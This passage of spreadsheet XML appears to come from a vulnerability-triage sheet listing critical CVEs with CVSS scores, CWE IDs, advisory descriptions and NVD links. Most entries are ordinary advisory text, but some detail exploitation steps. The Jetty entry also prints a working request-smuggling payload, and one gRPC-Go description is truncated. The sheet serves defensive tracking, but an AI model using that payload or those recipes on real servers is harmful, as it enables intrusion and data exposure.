          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18753</t>
        </is>
      </c>
    </row>
    <row r="616">
      <c r="A616" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18754</t>
        </is>
      </c>
      <c r="C616" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D616" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E616" s="5" t="inlineStr"/>
      <c r="F616" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G616" s="5" t="inlineStr"/>
      <c r="H616" s="5" t="inlineStr"/>
      <c r="I616" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J616" s="5" t="inlineStr"/>
      <c r="K616" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="L616" s="5" t="inlineStr">
        <is>
          <t>The
product firmware contains an embedded, static RSA private key utilized by the
Lighttpd web server for TLS termination. Exposure of this private key allows
malicious actors to breach the confidentiality and integrity of HTTPS
communications, enabling traffic decryption and server spoofing.</t>
        </is>
      </c>
      <c r="M616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18754</t>
        </is>
      </c>
    </row>
    <row r="617">
      <c r="A617" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18924</t>
        </is>
      </c>
      <c r="C617" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D617" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E617" s="5" t="inlineStr"/>
      <c r="F617" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G617" s="5" t="inlineStr"/>
      <c r="H617" s="5" t="inlineStr"/>
      <c r="I617" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J617" s="5" t="inlineStr"/>
      <c r="K617" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L617" s="5" t="inlineStr">
        <is>
          <t>A flaw in libcurl's handling of HTTP/2 Server Push streams, when the parent
handle is set to share connections with other handles, can lead to
use-after-free in the cleanup process.</t>
        </is>
      </c>
      <c r="M617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18924</t>
        </is>
      </c>
    </row>
    <row r="618">
      <c r="A618" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19646</t>
        </is>
      </c>
      <c r="C618" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D618" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E618" s="5" t="inlineStr"/>
      <c r="F618" s="5" t="inlineStr"/>
      <c r="G618" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H618" s="5" t="inlineStr"/>
      <c r="I618" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J618" s="5" t="inlineStr"/>
      <c r="K618" s="5" t="inlineStr">
        <is>
          <t>CWE-1149</t>
        </is>
      </c>
      <c r="L618" s="5" t="inlineStr">
        <is>
          <t>IBM Common Licensing Agent 9.0, Agent 9.0.0.1, Agent 9.0.0.2, ART 9.0, ART 9.0.0.1, and ART 9.0.0.2 could allow a remote attacker to redirect users to an arbitrary domain due to improper validation of the HTTP Host header.</t>
        </is>
      </c>
      <c r="M618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19646</t>
        </is>
      </c>
    </row>
    <row r="619">
      <c r="A619" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19874</t>
        </is>
      </c>
      <c r="C619" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D619" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E619" s="5" t="inlineStr"/>
      <c r="F619" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G619" s="5" t="inlineStr"/>
      <c r="H619" s="5" t="inlineStr"/>
      <c r="I619" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J619" s="5" t="inlineStr"/>
      <c r="K619" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L619" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow vulnerability exists in Konami's Metal Gear Online 3, originating from improper validation of lobby data fields related to kicked players. The affected function processes a list of kicked player identifiers using the lobby data key "kick_num" to determine the number of entries, and individual kicked player IDs supplied via keys in the format "kicked_id_%i". The function does not validate that "kick_num" falls within the expected bounds. The game design limits matches to a maximum of 16 players, and the corresponding buffer for storing kicked player IDs is sized accordingly. If "kick_num" exceeds this limit, the function continues writing the provided player IDs past the end of the intended buffer and into adjacent memory regions. These adjacent regions contain Steam callback handler structures responsible for processing lobby data updates, lobby messages, and other related events. By supplying an oversized "kick_num" value and appropriate "kicked_id_%i" fields, an attacker can overwrite fields within the callback handler structures, including function pointers and callback argument values. Successful exploitation may enable control-flow hijacking, potentially allowing arbitrary code execution within the game process.</t>
        </is>
      </c>
      <c r="M619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19874</t>
        </is>
      </c>
    </row>
    <row r="620">
      <c r="A620" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-22590</t>
        </is>
      </c>
      <c r="C620" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D620" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E620" s="5" t="inlineStr"/>
      <c r="F620" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G620" s="5" t="inlineStr"/>
      <c r="H620" s="5" t="inlineStr"/>
      <c r="I620" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J620" s="5" t="inlineStr"/>
      <c r="K620" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-131</t>
        </is>
      </c>
      <c r="L620" s="5" t="inlineStr">
        <is>
          <t>eprosima Fast DDS is a C++ implementation of the DDS (Data Distribution Service) standard of the OMG (Object Management Group). Versions prior to 2.6.12, 2.14.6, 3.2.4, 3.3.1, and 3.4.2 have a remotely triggerable Out-of-Bounds Read while processing RTPS `DATA_FRAG` submessages. An attacker can craft a `DATA_FRAG` with a large `sampleSize` but a small actual payload, and set `fragmentsInSubmessage` such that the receiver treats the packet as the LAST fragment**. In this LAST-fragment path, Fast-DDS computes `incoming_length` based on `sampleSize` and calls `memcpy()` without validating `incoming_data.length &gt;= incoming_length`. As a result, `CacheChange_t::add_fragments()` reads past the received UDP datagram buffer and into adjacent heap memory, copying those bytes into the reassembly buffer. In a Discovery Server deployment, the resulting `CacheChange_t` can be relayed to other participants, meaning that a newly joining participant may receive leaked heap memory (e.g., pointer values that could aid ASLR bypass). Versions 2.6.12, 2.14.6, 3.2.4, 3.3.1, and 3.4.2 fix the issue.</t>
        </is>
      </c>
      <c r="M620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-22590</t>
        </is>
      </c>
    </row>
    <row r="621">
      <c r="A621" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-2332</t>
        </is>
      </c>
      <c r="C621" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D621" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E621" s="5" t="inlineStr"/>
      <c r="F621" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="G621" s="5" t="inlineStr"/>
      <c r="H621" s="5" t="inlineStr">
        <is>
          <t>eclipse:jetty</t>
        </is>
      </c>
      <c r="I621" s="5" t="inlineStr">
        <is>
          <t>2026-04-14</t>
        </is>
      </c>
      <c r="J621" s="5" t="inlineStr"/>
      <c r="K621" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L621" s="5" t="inlineStr">
        <is>
          <t>In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the "funky chunks" techniques outlined here:
  *  https://w4ke.info/2025/06/18/funky-chunks.html
  *  https://w4ke.info/2025/10/29/funky-chunks-2.html
Jetty terminates chunk extension parsing at \r\n inside quoted strings instead of treating this as an error.
POST / HTTP/1.1
Host: localhost
Transfer-Encoding: chunked
1;ext="val
X
0
GET /smuggled HTTP/1.1
...
Note how the chunk extension does not close the double quotes, and it is able to inject a smuggled request.</t>
        </is>
      </c>
      <c r="M621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-2332</t>
        </is>
      </c>
    </row>
    <row r="622">
      <c r="A622" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27690</t>
        </is>
      </c>
      <c r="C622" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D622" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E622" s="5" t="inlineStr"/>
      <c r="F622" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G622" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H622" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I622" s="5" t="inlineStr">
        <is>
          <t>2026-07-14</t>
        </is>
      </c>
      <c r="J622" s="5" t="inlineStr"/>
      <c r="K622" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L622" s="5" t="inlineStr">
        <is>
          <t>Due to an HTTP Request Smuggling vulnerability in SAP Approuter, an unauthenticated attacker could send a specially crafted HTTP request that leads to request-response desynchronization. This could result in the exposure of user responses and cause the system to become unavailable. This leads to a high impact on confidentiality and availability.</t>
        </is>
      </c>
      <c r="M622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27690</t>
        </is>
      </c>
    </row>
    <row r="623">
      <c r="A623" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27962</t>
        </is>
      </c>
      <c r="C623" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D623" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E623" s="5" t="inlineStr"/>
      <c r="F623" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G623" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H623" s="5" t="inlineStr">
        <is>
          <t>authlib:authlib</t>
        </is>
      </c>
      <c r="I623" s="5" t="inlineStr">
        <is>
          <t>2026-03-16</t>
        </is>
      </c>
      <c r="J623" s="5" t="inlineStr"/>
      <c r="K623" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L623" s="5" t="inlineStr">
        <is>
          <t>Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a JWK Header Injection vulnerability in authlib's JWS implementation allows an unauthenticated attacker to forge arbitrary JWT tokens that pass signature verification. When key=None is passed to any JWS deserialization function, the library extracts and uses the cryptographic key embedded in the attacker-controlled JWT jwk header field. An attacker can sign a token with their own private key, embed the matching public key in the header, and have the server accept the forged token as cryptographically valid — bypassing authentication and authorization entirely. This issue has been patched in version 1.6.9.</t>
        </is>
      </c>
      <c r="M623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27962</t>
        </is>
      </c>
    </row>
    <row r="624">
      <c r="A624" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33186</t>
        </is>
      </c>
      <c r="C624" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D624" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E624" s="5" t="inlineStr"/>
      <c r="F624" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="G624" s="5" t="inlineStr"/>
      <c r="H624" s="5" t="inlineStr">
        <is>
          <t>grpc:grpc</t>
        </is>
      </c>
      <c r="I624" s="5" t="inlineStr">
        <is>
          <t>2026-03-20</t>
        </is>
      </c>
      <c r="J624" s="5" t="inlineStr"/>
      <c r="K624" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-551</t>
        </is>
      </c>
      <c r="L624" s="5" t="inlineStr">
        <is>
          <t>gRPC-Go is</t>
        </is>
      </c>
      <c r="M624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33186</t>
        </is>
      </c>
    </row>
    <row r="625">
      <c r="A625" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39830</t>
        </is>
      </c>
      <c r="C625" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D625" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E625" s="5" t="inlineStr"/>
      <c r="F625" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G625" s="5" t="inlineStr"/>
      <c r="H625" s="5" t="inlineStr">
        <is>
          <t>golang:crypto</t>
        </is>
      </c>
      <c r="I625" s="5" t="inlineStr">
        <is>
          <t>2026-05-22</t>
        </is>
      </c>
      <c r="J625" s="5" t="inlineStr"/>
      <c r="K625" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-772</t>
        </is>
      </c>
      <c r="L625" s="5" t="inlineStr">
        <is>
          <t>A malicious SSH peer could send unsolicited global request responses to fill an internal buffer, blocking the connection's read loop. The blocked goroutine could not be released by calling Close(), resulting in a resource leak per connection. Unsolicited global responses are now discarded.</t>
        </is>
      </c>
      <c r="M625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39830</t>
        </is>
      </c>
    </row>
    <row r="626">
      <c r="A626" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39832</t>
        </is>
      </c>
      <c r="C626" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D626" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E626" s="5" t="inlineStr"/>
      <c r="F626" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G626" s="5" t="inlineStr">
        <is>
          <t>openssh</t>
        </is>
      </c>
      <c r="H626" s="5" t="inlineStr">
        <is>
          <t>golang:crypto</t>
        </is>
      </c>
      <c r="I626" s="5" t="inlineStr">
        <is>
          <t>2026-05-22</t>
        </is>
      </c>
      <c r="J626" s="5" t="inlineStr"/>
      <c r="K626" s="5" t="inlineStr">
        <is>
          <t>CWE-281, CWE-502</t>
        </is>
      </c>
      <c r="L626" s="5" t="inlineStr">
        <is>
          <t>When adding a key to a remote agent constraint extensions such as restrict-destination-v00@openssh.com were not serialized in the request. Destination restrictions were silently stripped when forwarding keys, allowing unrestricted use of the key on the remote host. The client now serializes all constraint extensions. Additionally, the in-memory keyring returned by NewKeyring() now rejects keys with unsupported constraint extensions instead of silently ignoring them.</t>
        </is>
      </c>
      <c r="M626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39832</t>
        </is>
      </c>
    </row>
    <row r="627">
      <c r="A627" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41869</t>
        </is>
      </c>
      <c r="C627" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D627" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E627" s="5" t="inlineStr"/>
      <c r="F627" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G627" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H627" s="5" t="inlineStr">
        <is>
          <t>apache:nutch</t>
        </is>
      </c>
      <c r="I627" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J627" s="5" t="inlineStr"/>
      <c r="K627" s="5" t="inlineStr">
        <is>
          <t>CWE-404, CWE-862</t>
        </is>
      </c>
      <c r="L627" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization, Improper Resource Shutdown and Job Interruption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627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41869</t>
        </is>
      </c>
    </row>
    <row r="628">
      <c r="A628" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42044</t>
        </is>
      </c>
      <c r="C628" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D628" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E628" s="5" t="inlineStr"/>
      <c r="F628" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G628" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H628" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I628" s="5" t="inlineStr">
        <is>
          <t>2026-04-24</t>
        </is>
      </c>
      <c r="J628" s="5" t="inlineStr"/>
      <c r="K628" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-915</t>
        </is>
      </c>
      <c r="L628" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. From 1.0.0 to before 1.15.2, he Axios library is vulnerable to a Prototype Pollution "Gadget" attack that allows any Object.prototype pollution in the application's dependency tree to be escalated into surgical, invisible modification of all JSON API responses — including privilege escalation, balance manipulation, and authorization bypass. The default transformResponse function at lib/defaults/index.js:124 calls JSON.parse(data, this.parseReviver), where this is the merged config object. Because parseReviver is not present in Axios defaults, not validated by assertOptions, and not subject to any constraints, a polluted Object.prototype.parseReviver function is called for every key-value pair in every JSON response, allowing the attacker to selectively modify individual values while leaving the rest of the response intact. This vulnerability is fixed in 1.15.2.</t>
        </is>
      </c>
      <c r="M628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42044</t>
        </is>
      </c>
    </row>
    <row r="629">
      <c r="A629" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42508</t>
        </is>
      </c>
      <c r="C629" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D629" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E629" s="5" t="inlineStr"/>
      <c r="F629" s="5" t="n">
        <v>0.073</v>
      </c>
      <c r="G629" s="5" t="inlineStr"/>
      <c r="H629" s="5" t="inlineStr">
        <is>
          <t>golang:crypto</t>
        </is>
      </c>
      <c r="I629" s="5" t="inlineStr">
        <is>
          <t>2026-05-22</t>
        </is>
      </c>
      <c r="J629" s="5" t="inlineStr"/>
      <c r="K629" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L629" s="5" t="inlineStr">
        <is>
          <t>Previously, a revoked 'SignatureKey' belonging to a CA was not correctly checked for revocation. Now, both the 'key' and 'key.SignatureKey' are checked for @revoked.</t>
        </is>
      </c>
      <c r="M629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42508</t>
        </is>
      </c>
    </row>
    <row r="630">
      <c r="A630" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42579</t>
        </is>
      </c>
      <c r="C630" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D630" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E630" s="5" t="inlineStr"/>
      <c r="F630" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G630" s="5" t="inlineStr"/>
      <c r="H630" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I630" s="5" t="inlineStr">
        <is>
          <t>2026-05-13</t>
        </is>
      </c>
      <c r="J630" s="5" t="inlineStr"/>
      <c r="K630" s="5" t="inlineStr">
        <is>
          <t>CWE-1286, CWE-20, CWE-400, CWE-626</t>
        </is>
      </c>
      <c r="L630" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty's DNS codec does not enforce RFC 1035 domain name constraints during either encoding or decoding. This creates a bidirectional attack surface: malicious DNS responses can exploit the decoder, and user-influenced hostnames can exploit the encoder. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.</t>
        </is>
      </c>
      <c r="M630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42579</t>
        </is>
      </c>
    </row>
    <row r="631">
      <c r="A631" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42584</t>
        </is>
      </c>
      <c r="C631" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D631" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E631" s="5" t="inlineStr"/>
      <c r="F631" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G631" s="5" t="inlineStr"/>
      <c r="H631" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I631" s="5" t="inlineStr">
        <is>
          <t>2026-05-13</t>
        </is>
      </c>
      <c r="J631" s="5" t="inlineStr"/>
      <c r="K631" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L631" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpClientCodec pairs each inbound response with an outbound request by queue.poll() once per response, including for 1xx. If the client pipelines GET then HEAD and the server sends 103, then 200 with GET body, then 200 for HEAD, the queue pairs HEAD with the first 200. The HEAD rule then skips reading that message’s body, so the GET entity bytes stay on the stream and the following 200 is parsed from the wrong offset. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.</t>
        </is>
      </c>
      <c r="M631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42584</t>
        </is>
      </c>
    </row>
    <row r="632">
      <c r="A632" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45100</t>
        </is>
      </c>
      <c r="C632" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D632" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E632" s="5" t="inlineStr"/>
      <c r="F632" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G632" s="5" t="inlineStr"/>
      <c r="H632" s="5" t="inlineStr"/>
      <c r="I632" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J632" s="5" t="inlineStr"/>
      <c r="K632" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L632" s="5" t="inlineStr">
        <is>
          <t>OpenSIPS is a Session Initiation Protocol (SIP) server implementation. Versions 3.4.0-beta through 3.6.5 and 4.0.0-beta contain a buffer overflow in the {s.b64encode} string transformation. The size check for {s.b64encode} only verifies that the input fits within the 64 KB transformation buffer, but base64 encoding expands the data by roughly a third, so an input between about 49,153 and 65,535 bytes produces more output than the buffer can hold and overflows it by up to 21,844 bytes. Because these transformation buffers sit next to each other in memory and are reused for chained transformations, the overflow writes attacker-controlled data into the adjacent buffer and corrupts values used by later transformations processing the same SIP message. A remote attacker can trigger this by sending a SIP message with a large header value (roughly 50,000 bytes or more) when the routing script applies  {s.b64encode}  to attacker-controlled input, making exploitability dependent on the deployment's routing configuration. This issue has been fixed in versions 3.6.6 and 4.0.0-rc1.</t>
        </is>
      </c>
      <c r="M632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45100</t>
        </is>
      </c>
    </row>
    <row r="633">
      <c r="A633" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45537</t>
        </is>
      </c>
      <c r="C633" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D633" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E633" s="5" t="inlineStr"/>
      <c r="F633" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G633" s="5" t="inlineStr"/>
      <c r="H633" s="5" t="inlineStr"/>
      <c r="I633" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J633" s="5" t="inlineStr"/>
      <c r="K633" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L633" s="5" t="inlineStr">
        <is>
          <t>OpenSIPS is a Session Initiation Protocol (SIP) server implementation. In versions prior to 3.6.6 and 4.0.0-rc1, the construct_uri() function concatenates multiple URI components (protocol, username, domain, port, params) into a fixed 1024-byte global BSS buffer without any bounds checking. When a routing script calls construct_uri() with an attacker-controlled username, a combined component length exceeding 1024 bytes overflows the buffer, corrupting adjacent global data with attacker-controlled content. The overflow reaches disable_503_translation, a global flag controlling SIP 503 response handling, allowing an attacker to deterministically set the flag via the URI username and alter the server's routing behavior for subsequent messages. Because the same buffer is shared with contact_builder(), the overflow also corrupts that function's data, and without a memory sanitizer the adjacent globals are silently overwritten on every request containing a long username. This issue has been fixed in versions 3.6.6 and 4.0.0-rc1.</t>
        </is>
      </c>
      <c r="M633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45537</t>
        </is>
      </c>
    </row>
    <row r="634">
      <c r="A634" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45764</t>
        </is>
      </c>
      <c r="C634" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D634" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E634" s="5" t="inlineStr"/>
      <c r="F634" s="5" t="inlineStr"/>
      <c r="G634" s="5" t="inlineStr"/>
      <c r="H634" s="5" t="inlineStr"/>
      <c r="I634" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J634" s="5" t="inlineStr"/>
      <c r="K634" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L634" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, a protocol change while processing HTTP/2 traffic could lead to type confusion in Suricata. Crafted traffic may cause Suricata to crash, resulting in denial of service. Versions 7.0.16 and 8.0.5 contain a fix. As a workaround, disable HTTP/2 parsing if it is not required.</t>
        </is>
      </c>
      <c r="M634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45764</t>
        </is>
      </c>
    </row>
    <row r="635">
      <c r="A635" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47702</t>
        </is>
      </c>
      <c r="C635" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="D635" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E635" s="5" t="inlineStr"/>
      <c r="F635" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G635" s="5" t="inlineStr"/>
      <c r="H635" s="5" t="inlineStr"/>
      <c r="I635" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J635" s="5" t="inlineStr"/>
      <c r="K635" s="5" t="inlineStr">
        <is>
          <t>CWE-312</t>
        </is>
      </c>
      <c r="L635" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. In version 3.16.1, API tokens (bearer credentials used to authenticate against the builder API) are stored in the database as cleartext strings. An attacker who gains read access to the database (e.g., via SQL injection, backup exposure, or insider access) can extract all API tokens and impersonate any user without requiring a password or multi-factor authentication. Version 3.17.0 fixes the issue.</t>
        </is>
      </c>
      <c r="M635" s="6" t="inlineStr">
        <is>
